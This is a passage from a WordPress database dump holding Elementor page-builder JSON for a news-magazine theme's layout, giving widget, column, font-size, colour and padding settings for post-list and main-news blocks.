ost_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1181,433,'_elementor_version','0.4'),(1182,433,'_elementor_css','a:3:{s:4:\"time\";i:1508855868;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1183,434,'_elementor_edit_mode','builder'),(1184,434,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"6